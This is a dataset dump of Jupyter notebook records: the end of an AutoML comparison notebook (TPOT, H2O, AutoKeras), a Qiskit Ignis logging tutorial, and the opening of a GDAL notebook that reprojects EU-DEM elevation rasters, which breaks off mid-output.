"class AbstractModel(ABC):\n\n def __init__(self):\n self.time_limit_mins = 60*3\n self.seed = 42\n self.random_state = RandomState(self.seed)\n np.random.seed(self.seed)\n\n @abstractmethod\n def get_fitted_model(self, train_data, train_labels, params):\n pass\n\n @abstractmethod\n def get_accuracy(self, data, labels, fitted_model, params):\n pass\n\n @abstractmethod\n def get_best_pipeline(self, fitted_model):\n pass\n\n def run(self, train_data, test_data, params):\n train_labels = params[\"train_labels\"]\n test_labels = params[\"test_labels\"]\n\n fitted_model = self.get_fitted_model(train_data, train_labels, params)\n\n results = {\n \"test_acc\": self.get_accuracy(test_data, test_labels, fitted_model, params),\n \"train_acc\": self.get_accuracy(train_data, train_labels, fitted_model, params),\n \"best_pipeline\": self.get_best_pipeline(fitted_model),\n }\n print(type(fitted_model))\n print(results[\"test_acc\"])\n return results\n\nclass TPOTClassifierModel(AbstractModel):\n\n def __init__(self):\n super().__init__()\n\n def get_fitted_model(self, train_data, train_labels, params):\n return TPOTClassifier(\n max_time_mins=self.time_limit_mins,\n max_eval_time_mins=self.time_limit_mins,\n n_jobs=-1,\n random_state=self.seed,\n verbosity=1,\n ).fit(train_data, train_labels)\n \n def get_accuracy(self, data, labels, fitted_model, params):\n return round(fitted_model.score(data, labels), 3)\n\n def get_best_pipeline(self, fitted_model):\n return [step[1] for step in fitted_model.fitted_pipeline_.steps]\n\nclass H2OAutoMLModel(AbstractModel):\n\n def __init__(self):\n super().__init__()\n h2o.init(name=f\"#{rn.SystemRandom().randint(1, 2**30)}\", nthreads=20)\n h2o.no_progress()\n\n def get_fitted_model(self, train_data, train_labels, params):\n train_data = h2o.H2OFrame(np.concatenate((train_data, train_labels.reshape(-1, 1)), axis=1))\n x = np.array(train_data.columns)[:-1].tolist()\n y = np.array(train_data.columns)[-1].tolist()\n train_data[y] = train_data[y].asfactor()\n aml = H2OAutoML(max_runtime_secs=60*self.time_limit_mins, seed=self.seed)\n aml.train(x=x, y=y, training_frame=train_data)\n return aml\n\n def get_accuracy(self, data, labels, fitted_model, params):\n data = h2o.H2OFrame(np.concatenate((data, labels.reshape(-1, 1)), axis=1))\n y = np.array(data.columns)[-1].tolist()\n data[y] = data[y].asfactor()\n pred = fitted_model.predict(data).as_data_frame(header=False)[\"predict\"].values.astype(int)\n return np.round(np.mean(pred == labels), 3)\n\n def get_best_pipeline(self, fitted_model):\n leader_params = fitted_model.leader.get_params()\n best_pipeline = [leader_params[\"model_id\"][\"actual_value\"][\"name\"]]\n if \"base_models\" in leader_params:\n for base_model in leader_params[\"base_models\"][\"actual_value\"]:\n best_pipeline.append(base_model[\"name\"])\n print(best_pipeline)\n h2o.cluster().shutdown()\n return best_pipeline\n\nclass AutoKerasModel(AbstractModel):\n\n def __init__(self):\n super().__init__()\n import tensorflow as tf\n tf.set_random_seed(self.seed)\n import torch\n torch.multiprocessing.set_sharing_strategy(\"file_system\")\n torch.manual_seed(self.seed)\n\n def get_fitted_model(self, x_train, y_train, params):\n s = np.sqrt(x_train.shape[1]).astype(int)\n x_train = x_train.reshape((len(x_train), s, s, 1))\n clf = ak.ImageClassifier(augment=True, path=generate_tmpdir(), verbose=False)\n clf.fit(x_train, y_train, time_limit=60*self.time_limit_mins)\n return clf\n\n def get_accuracy(self, x, y, clf, params):\n s = 
np.sqrt(x.shape[1]).astype(int)\n x = x.reshape((len(x), s, s, 1))\n y_pred = clf.predict(x)\n return np.round(accuracy_score(y_true=y, y_pred=y_pred), 3)\n\n def get_best_pipeline(self, clf):\n return [m for i, m in enumerate(clf.cnn.best_model.produce_model().modules()) if i > 0]",
"_____no_output_____"
],
[
"def get_model_params_dict_list(train_labels, test_labels):\n model_params_base = {\"train_labels\": train_labels, \"test_labels\": test_labels}\n return [\n {\n \"model\": TPOTClassifierModel,\n \"params_list\": [{**model_params_base}],\n \"use_clean_train_data\": False\n },\n # {\n # \"model\": TPOTClassifierModel,\n # \"params_list\": [{**model_params_base}],\n # \"use_clean_train_data\": True\n # },\n # {\n # \"model\": H2OAutoMLModel,\n # \"params_list\": [{**model_params_base}],\n # \"use_clean_train_data\": False\n # },\n # {\n # \"model\": H2OAutoMLModel,\n # \"params_list\": [{**model_params_base}],\n # \"use_clean_train_data\": True\n # },\n # {\n # \"model\": AutoKerasModel,\n # \"params_list\": [{**model_params_base}],\n # \"use_clean_train_data\": False\n # },\n # {\n # \"model\": AutoKerasModel,\n # \"params_list\": [{**model_params_base}],\n # \"use_clean_train_data\": True\n # },\n ]",
"_____no_output_____"
],
[
"def visualize(df):\n visualize_scores(\n df,\n score_names=[\"test_acc\", \"train_acc\"],\n is_higher_score_better=[True, True],\n err_param_name=\"max_angle\",\n # err_param_name=\"std\",\n title=\"Classification scores with added error\"\n )\n plt.show()",
"_____no_output_____"
],
[
"train_data, test_data, train_labels, test_labels = get_data()\n\ndf = runner.run(\n train_data=train_data,\n test_data=test_data,\n preproc=Preprocessor,\n preproc_params=None,\n err_root_node=get_err_root_node(),\n err_params_list=get_err_params_list(train_data),\n model_params_dict_list=get_model_params_dict_list(train_labels, test_labels),\n n_processes=1\n)",
"_____no_output_____"
],
[
"print_results_by_model(df,\n [\"train_labels\", \"test_labels\"],\n # [\"mean\", \"min_val\", \"max_val\", \"train_labels\", \"test_labels\"], \n err_param_name=\"max_angle\",\n # err_param_name=\"std\",\n pipeline_name=\"best_pipeline\"\n)\nvisualize(df)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e706973402bf81546ef7cefe95ff2c28fdfc18df | 19,995 | ipynb | Jupyter Notebook | qiskit/advanced/ignis/9_ignis_logging.ipynb | jessicapointing/qiskit-iqx-tutorials | b9b2a65f9c674728ef81fab36bcd871ad20e436b | [
"Apache-2.0"
] | 2 | 2019-12-09T08:24:21.000Z | 2019-12-12T08:00:03.000Z | qiskit/advanced/ignis/9_ignis_logging.ipynb | jessicapointing/qiskit-iqx-tutorials | b9b2a65f9c674728ef81fab36bcd871ad20e436b | [
"Apache-2.0"
] | null | null | null | qiskit/advanced/ignis/9_ignis_logging.ipynb | jessicapointing/qiskit-iqx-tutorials | b9b2a65f9c674728ef81fab36bcd871ad20e436b | [
"Apache-2.0"
] | null | null | null | 41.057495 | 646 | 0.553388 | [
[
[
"<img src=\"../../../images/qiskit_header.png\" alt=\"Note: In order for images to show up in this jupyter notebook you need to select File => Trusted Notebook\" align=\"middle\">",
"_____no_output_____"
],
[
"# Ignis Logging\n---\n\n* **Last Updated:** August 4, 2019\n* **Requires:** qiskit-ignis 0.2\n\n# Introduction\n\nThis tutorial shows how to use logging in Ignis. The purpose of Ignis logging is twofold:\n1. Log run-time events and emit messages to the console.\n2. Log data of interest to a file. \n\nIgnis logging is based on [Python's logging package](https://docs.python.org/3/library/logging.html). There are 3 classes in the Ignis logging module: \n\n* **IgnisLogger** - Objects of this class are used for logging. The class is derived from the Logger class defined in the Python's logging package.\n* **IgnisLogging** - A singleton class responsible for configuring logging behavior in Ignis as well as for creating IgnisLogger objects.\n* **IgnisLogReader** - A class for reading file logs created by IgnisLogger objects, containing filtering capabilities support.\n\n\n## Using IgnisLogger\n\nIn this section we will see how to log data to console and files using `IgnisLogger` objects.\n\n### Creating a logger object\nConsole and file logging in Ignis is performed using an object of the class `IgnisLogger`. Such an object is essentially a `Logger` object of the [Python's logging package](https://docs.python.org/3/library/logging.html), extended with a convenient file logging capability. \n\nLet's create such an object:",
"_____no_output_____"
]
],
[
[
"from qiskit.ignis.logging import ignis_logging\n\nlogger = ignis_logging.IgnisLogging().get_logger(__name__)",
"_____no_output_____"
]
],
[
[
"You can see here the use of the `IgnisLogging` singleton class for getting an `IgnisLogger` object. The parameter for the `get_logger` method gives the logger its name. This name is used when messages are printed to the console, to identify the source file which the log was printed from. ",
"_____no_output_____"
],
[
"### Logging to console\n\nLogging to console using an `IgnisLogger` object is identical to using [Python's logging package](https://docs.python.org/3/library/logging.html). For convenience, here are some examples:\n\n",
"_____no_output_____"
]
],
[
[
"logger.info(\"An info message\") # wont show by default\nlogger.warning(\"This is a warning\")\nlogger.error(\"An error message\")\nlogger.critical(\"Critical error\")\n",
"WARNING: __main__ - This is a warning\nERROR: __main__ - An error message\nCRITICAL: __main__ - Critical error\n"
]
],
[
[
"#### Configuring console logging\nEssentially, console logging in Ignis is identical to python logging. For the most part, the important aspect to consider when using Python logging is message levels. There are 5 pre-defined message levels in Python logging, as listed below, in ascending order of severity:\n\nDEBUG <br>\nINFO <br>\nWARNING <br>\nERROR <br>\nCRITICAL <br>\n\nThe default message level in Python logging is WARNING, meaning all messages of WARNING severity or higher will be logged to the console. This is why the INFO message in the example above was not printed. You can set the severity level using the following code:\n\n",
"_____no_output_____"
]
],
[
[
"import logging\nlogger.setLevel(logging.INFO)\nlogger.info(\"This will be printed now\")",
"INFO: __main__ - This will be printed now\n"
]
],
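[
[
"# A follow-on sketch (not in the original tutorial): lowering the level further\n# also makes DEBUG messages visible.\nlogger.setLevel(logging.DEBUG)\nlogger.debug(\"This debug message is shown once the level is DEBUG\")",
"_____no_output_____"
]
],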
[
[
"For complete documentation on Python logging, see [here](https://docs.python.org/3/library/logging.html).\n\n### Logging to file\n\nLogging to file is carried out by using the `log_to_file` method of the `IgnisLogger` class. The method expects key-value pairs given as Python keyword parameters. Any number of key-value pairs can be given to the method. Each call to the `log_to_file` method results in a new line being appended and stored in the log file. Each line contains a timestamp, an identifying name and list of key-value pairs. Here are a few examples:",
"_____no_output_____"
]
],
[
[
"logger.log_to_file(t1=0.1, t2='0.3')\nlogger.log_to_file(qubits=[0,1,3], fidelity=.9998)\nlogger.log_to_file(dictionary={'a':1, 'b':2})",
"_____no_output_____"
]
],
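[
[
"# A minimal sketch of the file-logging switches described in the configuration\n# notes below (assumption: the methods take no arguments).\nlogger.enable_file_logging()\nlogger.log_to_file(sketch_key='sketch_value')\nlogger.disable_file_logging()",
"_____no_output_____"
]
],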
[
[
"And this is how these are logged in the log file:\n\n``\n2019/06/02 11:36:28 ignis_logging 't1':'0.1' 't2':'0.3' \n2019/06/02 11:36:28 ignis_logging 'qubits':'[0, 1, 3]' 'fidelity':'0.9998' \n2019/06/02 11:36:28 ignis_logging 'dictionary':'{'a': 1, 'b': 2}\n``\n\nNotice how the data is stored:\nEach key-value pair is separated by a colon (:), the pairs are separated by space and all keys and values are put in single quotes ('). This makes it easy to import the data into a CSV or other regular data formats. \n\n### Configuring the IgnisLogger\n\nBesides creating `IgnisLogger` objects, the `IgnisLogger` class is used to configure the file logging aspects in Ignis. The main aspects controlled by the `IgnisLogger` class are:\n\n* Enabling/disabling file logging.\n* Location of the log files.\n* Miscellaneous log file controls. \n\nThe main vehicle for configuring Ignis logging is a configuration file, named *logging.yaml*, whose full path is expected by `IgnisLogger` to be:\n\n``\n<USER HOME DIR>/.qiskit/logging.yaml\n``\n\nAn example configuration file is located in the logging directory of Ignis. You can use this file as a starting point. \n\nThe main settings in the configuration file are as follow:\n\n```yaml\nfile_logging: true\t\t# Enables/disables file logging (true/false)\nlog_file: ignis_test_log.log\t# Name of the file log\nmax_size: 1000000\t\t# Max file size (in bytes). \nmax_rotations: 5\t\t# Max number of file rotations\n```\n\nThe max_size and max_rotations settings are used in conjunction with each other to limit the amount of disk space used for logging. Up to max_rotations files will be stored on disk, each of which is limited to max_size bytes in size, such that the most recent max_size * max_rotations bytes are stored in one or more log files. Rotated file names' are automatically suffixed with numbers. \n\nFile logging can be enabled or disabled either by using the logging configuration file or by calling the `enable_file_logging` or `disable_file_logging` methods of `IgnisLogger`, respectively. \n\nNote: File logging is disabled by default if no logging configuration file is provided. Enabling file logging without using a configuration file (i.e. programatically) results in `IgnisLogging` using its internal file logging default settings.\n\n\n\n## IgnisLogReader\n\nThe Ignis logging module comes with a log reader class called `IgnisLogReader`. The purpose of `IgnisLogReader` is to retrieve log data from Ignis log files in such a way that it can be further processed and analyzed. In essence, `IgnisLogReader` returns a list of lists, each of which contains a list of key-value pairs. \n\nNote: since any data can be stored using `IgnisLogger`'s `log_to_file` method, it is up to the user to correctly interpret the logged data when using the `IgnisLogReader` class. \n\n### Reading log data\nThe most basic usage of the `IgnisLogReader` is to retrieve all the data stored in the log file (or multiple files, in case of file rotations). Here is how this can be achieved: ",
"_____no_output_____"
]
],
[
[
"log_reader = ignis_logging.IgnisLogReader()\nrows = log_reader.read_values()\nprint(*rows, sep=\"\\n\")",
"['2019/06/02', '11:32:25', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '11:32:25', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '11:32:35', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '11:32:35', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '11:34:54', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '11:34:54', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '11:35:03', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '11:35:03', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '11:36:25', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '11:36:25', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '11:36:25', \"'dictionary':'{'a':\", '1,', \"'b':\", \"2}'\"]\n['2019/06/02', '11:36:28', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '11:36:28', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '11:36:28', \"'dictionary':'{'a':\", '1,', \"'b':\", \"2}'\"]\n['2019/06/02', '13:21:57', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '13:21:57', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '13:21:57', \"'dictionary':'{'a':\", '1,', \"'b':\", \"2}'\"]\n['2019/06/02', '14:12:24', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '14:12:24', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '14:12:24', \"'dictionary':'{'a':\", '1,', \"'b':\", \"2}'\"]\n['2019/06/02', '14:12:53', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '14:12:53', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '14:12:53', \"'dictionary':'{'a':\", '1,', \"'b':\", \"2}'\"]\n['2019/06/02', '14:14:56', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '14:14:56', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '14:14:56', \"'dictionary':'{'a':\", '1,', \"'b':\", \"2}'\"]\n"
]
],
[
[
"Note how the data is retrieved as a list of lists. In addition, when a logging configuration file is used, `IgnisLogReader` will automatically read the log files as defined in the configuration file. You can specify a custom log file to read from using the log_file parameter of the `read_values` method.\n\n#### Filtering by date and time\n`IgnisLogReader` supports date/time based filtering. You can specify a to and a from date/time, as well as a from-to range by combining both to and from datetime specifications. Here are a couple example:",
"_____no_output_____"
]
],
[
[
"rows = log_reader.read_values(from_datetime=\"2019/06/02 11:36:25\")\nprint(*rows, sep=\"\\n\")",
"['2019/06/02', '11:36:25', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '11:36:25', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '11:36:25', \"'dictionary':'{'a':\", '1,', \"'b':\", \"2}'\"]\n['2019/06/02', '11:36:28', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '11:36:28', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '11:36:28', \"'dictionary':'{'a':\", '1,', \"'b':\", \"2}'\"]\n['2019/06/02', '13:21:57', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '13:21:57', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '13:21:57', \"'dictionary':'{'a':\", '1,', \"'b':\", \"2}'\"]\n['2019/06/02', '14:12:24', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '14:12:24', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '14:12:24', \"'dictionary':'{'a':\", '1,', \"'b':\", \"2}'\"]\n['2019/06/02', '14:12:53', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '14:12:53', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '14:12:53', \"'dictionary':'{'a':\", '1,', \"'b':\", \"2}'\"]\n"
],
[
"from datetime import datetime\nto_dt = datetime.strptime(\"02/06/19 11:36:25\", \"%d/%m/%y %H:%M:%S\")\nrows = log_reader.read_values(from_datetime=\"2019/06/02 11:36:25\", to_datetime=to_dt)\nprint(*rows, sep=\"\\n\")",
"['2019/06/02', '11:36:25', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '11:36:25', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '11:36:25', \"'dictionary':'{'a':\", '1,', \"'b':\", \"2}'\"]\n"
]
],
[
[
"Note how the date/time parameters can handle both date/time strings as well as datetime objects. \n#### Filtering by key names\nYou can also ask `IgnisLogReader` to retrieve only key-values pairs of specific keys. Use the _keys_ parameter of the `read_values` method to achieve that. For example: ",
"_____no_output_____"
]
],
[
[
"rows = log_reader.read_values(keys=\"t1\")\nprint(*rows, sep=\"\\n\")\n",
"['2019/06/02', '11:32:25', \"'t1':'0.1'\"]\n['2019/06/02', '11:32:35', \"'t1':'0.1'\"]\n['2019/06/02', '11:34:54', \"'t1':'0.1'\"]\n['2019/06/02', '11:35:03', \"'t1':'0.1'\"]\n['2019/06/02', '11:36:25', \"'t1':'0.1'\"]\n['2019/06/02', '11:36:28', \"'t1':'0.1'\"]\n['2019/06/02', '13:21:57', \"'t1':'0.1'\"]\n['2019/06/02', '14:12:24', \"'t1':'0.1'\"]\n['2019/06/02', '14:12:53', \"'t1':'0.1'\"]\n"
],
[
"rows = log_reader.read_values(keys=[\"t2\", \"fidelity\"], to_datetime=to_dt)\nprint(*rows, sep=\"\\n\")",
"['2019/06/02', '11:32:25', \"'t2':'0.3'\"]\n['2019/06/02', '11:32:25', \"'fidelity':'0.9998'\"]\n['2019/06/02', '11:32:35', \"'t2':'0.3'\"]\n['2019/06/02', '11:32:35', \"'fidelity':'0.9998'\"]\n['2019/06/02', '11:34:54', \"'t2':'0.3'\"]\n['2019/06/02', '11:34:54', \"'fidelity':'0.9998'\"]\n['2019/06/02', '11:35:03', \"'t2':'0.3'\"]\n['2019/06/02', '11:35:03', \"'fidelity':'0.9998'\"]\n['2019/06/02', '11:36:25', \"'t2':'0.3'\"]\n['2019/06/02', '11:36:25', \"'fidelity':'0.9998'\"]\n"
]
],
[
[
"Once retrieved you can convert the data into a csv object, pandas or any other format for further processing and visualization. ",
"_____no_output_____"
]
],
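[
[
"# A minimal sketch of the conversion mentioned above: the retrieved list of rows\n# maps directly onto a pandas DataFrame (column handling is up to the user, since\n# rows may differ in length).\nimport pandas as pd\npd.DataFrame(log_reader.read_values(keys=\"t1\"))",
"_____no_output_____"
]
],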
[
[
"import qiskit.tools.jupyter\n%qiskit_version_table\n%qiskit_copyright",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
e706974337b281441e1c0b477ef59555dbe670cd | 30,344 | ipynb | Jupyter Notebook | run_DEM_EUDEMv11_ipy.ipynb | HeZhang1994/DEM-Digital-Elevation-Model-Python-Tool | c6fc811d17143faf3473f2b7cbcaebb9819b7a53 | [
"MIT"
] | 73 | 2019-02-24T06:43:12.000Z | 2022-03-16T03:51:33.000Z | run_DEM_EUDEMv11_ipy.ipynb | HeZhang1994/DEM-Digital-Elevation-Model-Tools | c6fc811d17143faf3473f2b7cbcaebb9819b7a53 | [
"MIT"
] | 1 | 2019-02-19T09:35:03.000Z | 2019-02-19T09:35:03.000Z | run_DEM_EUDEMv11_ipy.ipynb | HeZhang1994/DEM-Digital-Elevation-Model-Tools | c6fc811d17143faf3473f2b7cbcaebb9819b7a53 | [
"MIT"
] | 23 | 2019-03-28T01:03:55.000Z | 2022-03-26T06:45:12.000Z | 41.681319 | 551 | 0.516379 | [
[
[
"'''Python for Processing Digital Elevation Models (DEMs).\n\nAuthor: He Zhang @ University of Exeter\nDate: 16th March 2019 (Update: 20th April 2019)\nContact: [email protected] [email protected]\n\nCopyright (c) 2019 He Zhang\n'''\n\n'''\nDEM Data:\n EUDEMv11 - EU-DEMv1.1\n Download Link: https://land.copernicus.eu/imagery-in-situ/eu-dem/eu-dem-v1.1\n\nTerms and Abbreviations:\n EPSG - European Petroleum Survey Group\n GCS - Geographic Coordinate System (Identified by an unique EPSG code)\n PCS - Projected Coordinate System (Identified by an unique EPSG code)\n WGS-84 [EPSG 4326] - 1984 World Geodetic System [GCS]\n Merc [EPSG 3857] - Mercator -> Web Mercator -> Pseudo Mercator [PCS of WGS-84]\n OSGB-36 [EPSG 4277] - 1936 Ordnance Survey Great Britain [GCS]\n BNG [EPSG 27700] - British National Grid [PCS of OSGB-36]\n ETRS-89 [EPSG 4258] - 1989 European Terrestrial Reference System [GCS]\n LAEA [EPSG 3035] - Lambert Azimuthal Equal-Area [PCS of ETRS-89]\n lat - Latitude\n lng - Longitude\n Transform - GCS to GCS\n Project - GCS to PCS, PCS to PCS\n Convert - PCS to PCS\n\nFunctions:\n Convert DEM from LAEA PCS to ETRS-89 GCS.\n\n Transform DEM from ETRS-89 GCS to WGS-84 GCS.\n Transform DEM from ETRS-89 GCS to OSGB-36 GCS.\n\n Get the elevation from DEM in WGS-84 GCS.\n Get the elevation from DEM in OSGB-36 GCS.\n Get the elevation from DEM in ETRS-89 GCS.\n\n******************** Important Information of Code Usage ********************\n- Use 'GDAL.GetProjection()' to check the GCS/PCS information of DEM (in TIF format).\n- Use 'GDAL.GetGeoTransform()' to check the resolution of DEMs.\n- Use 'GDAL.GetGeoTransform()' to check (lat, lng) of top-left corner of DEM (in GCS).\n- The (lat, lng) of other locations in DEM can therefore be calculated.\n- Each GCS has one related PCS (GCS/PCS is identified by an unique EPSG code).\n- You can transform DEM between different GCSs (e.g., WGS-84 <-> OSGB-36 <-> ETRS-89).\n- You can project DEM in GCS to the related PCS and then display its 2D image.\n- You can not display DEM in GCS as 2D image (e.g., WGS-84 -> 2D image is wrong).\n- You can not project DEM in GCS to the unrelated PCS (e.g., WGS-84 -> BNG is wrong).\n- You can not project DEM between different PCSs (e.g., Pseudo Mercator <-> BNG is wrong).\n* Use 'gdalwarp' command to transform/project DEM to different GCSs/PCSs might be correct.\n'''\n\n# Python 3.7\n\n# import os\n# import re\n# import shutil\n# import subprocess\n\n# import matplotlib.pyplot as plt\nimport numpy as np\nfrom osgeo import gdal\nfrom pandas import read_csv\n\nfrom pyDEM_function import get_dem_info\nfrom pyDEM_function import get_elevation\n# from pyDEM_function import get_file_names\n# from pyDEM_function import show_2d_dem\nfrom pyDEM_function import transprojcnvt_dem\n# from pyDEM_function import write_dem\n\n",
"_____no_output_____"
],
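[
"# A hedged illustration (not part of the original workflow): the 'gdalwarp' shell\n# command mentioned in the notes above can perform the same reprojection. The file\n# names below are hypothetical; -s_srs/-t_srs set the source/target EPSG codes.\n# !gdalwarp -s_srs EPSG:3035 -t_srs EPSG:4258 EUDEMv11_EPSG3035.tif EUDEMv11_EPSG4258.tif",
"_____no_output_____"
],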
[
"# Specify user settings.\n\n# Set the EPSG code.\nEPSG_WGS84 = 4326\nEPSG_OSGB36 = 4277\nEPSG_ETRS89 = 4258\nEPSG_LAEA = 3035\n\n# Set the format of DEMs.\nDEM_FORMAT = '.tif'\n\n# Set the path of DEMs.\nPATH_EUDEM = 'DATA/DATA_EUDEMv11/'\n# PATH_EUDEM_SOURCE = 'DATA/DATA_EUDEMv11/EPSG3035_s/' # The folder of source DEMs must exist.\n\n# Set the name of DEMs in GCSs.\nEUDEM_GCS_WD = 'EUDEMv11_EPSG4326.tif'\nEUDEM_GCS_UK = 'EUDEMv11_EPSG4277.tif'\nEUDEM_GCS_EU = 'EUDEMv11_EPSG4258.tif'\n\n# Set the name of DEMs in PCSs.\nEUDEM_PCS_WD = 'EUDEMv11_EPSG3857.tif'\nEUDEM_PCS_UK = 'EUDEMv11_EPSG27700.tif'\nEUDEM_PCS_EU = 'EUDEMv11_EPSG3035.tif'\n\n# Set the path of location data file.\nPATH_LD_STATION_DATA = 'DATA/DATA_LD_AirQuality/London_AirQuality_Stations.csv'\n",
"_____no_output_____"
],
[
"# <EUDEMv11> Convert DEM from LAEA PCS to ETRS-89 GCS.\n\nprint('\\n>>> <EUDEMv11> Convert DEM from LAEA PCS to ETRS-89 GCS.')\n\npath = PATH_EUDEM\ndem_in = path + EUDEM_PCS_EU\ndem_out = path + EUDEM_GCS_EU\n\nepsg_in = EPSG_LAEA\nepsg_out = EPSG_ETRS89\n\ntransprojcnvt_dem(dem_in, epsg_in, dem_out, epsg_out)\n\ndata = gdal.Open(dem_in)\nget_dem_info(data, if_print=True)\ndata = gdal.Open(dem_out)\nget_dem_info(data, if_print=True)\n\nprint('\\n>>> Complete!\\n')\n",
"\n>>> <EUDEMv11> Convert DEM from LAEA PCS to ETRS-89 GCS.\n\nThe information of DEM:\nThe number of row (height) is: 40000\nThe number of column (width) is: 40000\nThe number of band is: 1\nThe 6 GeoTransform parameters are:\n (3000000.0, 25.0, 0.0, 4000000.0, 0.0, -25.0)\nThe GCS/PCS information is:\n PROJCS[\"ETRS89_ETRS_LAEA\",GEOGCS[\"ETRS89\",DATUM[\"European_Terrestrial_Reference_System_1989\",SPHEROID[\"GRS 1980\",6378137,298.2572221010002,AUTHORITY[\"EPSG\",\"7019\"]],AUTHORITY[\"EPSG\",\"6258\"]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433],AUTHORITY[\"EPSG\",\"4258\"]],PROJECTION[\"Lambert_Azimuthal_Equal_Area\"],PARAMETER[\"latitude_of_center\",52],PARAMETER[\"longitude_of_center\",10],PARAMETER[\"false_easting\",4321000],PARAMETER[\"false_northing\",3210000],UNIT[\"metre\",1,AUTHORITY[\"EPSG\",\"9001\"]]]\n\nThe information of DEM:\nThe number of row (height) is: 30505\nThe number of column (width) is: 52428\nThe number of band is: 1\nThe 6 GeoTransform parameters are:\n (-12.266271034206424, 0.00033920980218715875, 0.0, 58.98761768429964, 0.0, -0.00033920980218715875)\nThe GCS/PCS information is:\n GEOGCS[\"ETRS89\",DATUM[\"European_Terrestrial_Reference_System_1989\",SPHEROID[\"GRS 1980\",6378137,298.2572221010002,AUTHORITY[\"EPSG\",\"7019\"]],TOWGS84[0,0,0,0,0,0,0],AUTHORITY[\"EPSG\",\"6258\"]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433],AUTHORITY[\"EPSG\",\"4258\"]]\n\n>>> Complete!\n\n"
],
[
"# <EUDEMv11> Transform DEM from ETRS-89 GCS to WGS-84 GCS.\n\nprint('\\n>>> <EUDEMv11> Transform DEM from ETRS-89 GCS to WGS-84 GCS.')\n\npath = PATH_EUDEM\ndem_in = path + EUDEM_GCS_EU\ndem_out = path + EUDEM_GCS_WD\n\nepsg_in = EPSG_ETRS89\nepsg_out = EPSG_WGS84\n\ntransprojcnvt_dem(dem_in, epsg_in, dem_out, epsg_out)\n\ndata = gdal.Open(dem_in)\nget_dem_info(data, if_print=True)\ndata = gdal.Open(dem_out)\nget_dem_info(data, if_print=True)\n\nprint('\\n>>> Complete!\\n')\n",
"\n>>> <EUDEMv11> Transform DEM from ETRS-89 GCS to WGS-84 GCS.\n\nThe information of DEM:\nThe number of row (height) is: 30505\nThe number of column (width) is: 52428\nThe number of band is: 1\nThe 6 GeoTransform parameters are:\n (-12.266271034206424, 0.00033920980218715875, 0.0, 58.98761768429964, 0.0, -0.00033920980218715875)\nThe GCS/PCS information is:\n GEOGCS[\"ETRS89\",DATUM[\"European_Terrestrial_Reference_System_1989\",SPHEROID[\"GRS 1980\",6378137,298.2572221010002,AUTHORITY[\"EPSG\",\"7019\"]],TOWGS84[0,0,0,0,0,0,0],AUTHORITY[\"EPSG\",\"6258\"]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433],AUTHORITY[\"EPSG\",\"4258\"]]\n\nThe information of DEM:\nThe number of row (height) is: 30505\nThe number of column (width) is: 52428\nThe number of band is: 1\nThe 6 GeoTransform parameters are:\n (-12.266271034206424, 0.00033920980218715875, 0.0, 58.98761768429964, 0.0, -0.00033920980218715875)\nThe GCS/PCS information is:\n GEOGCS[\"WGS 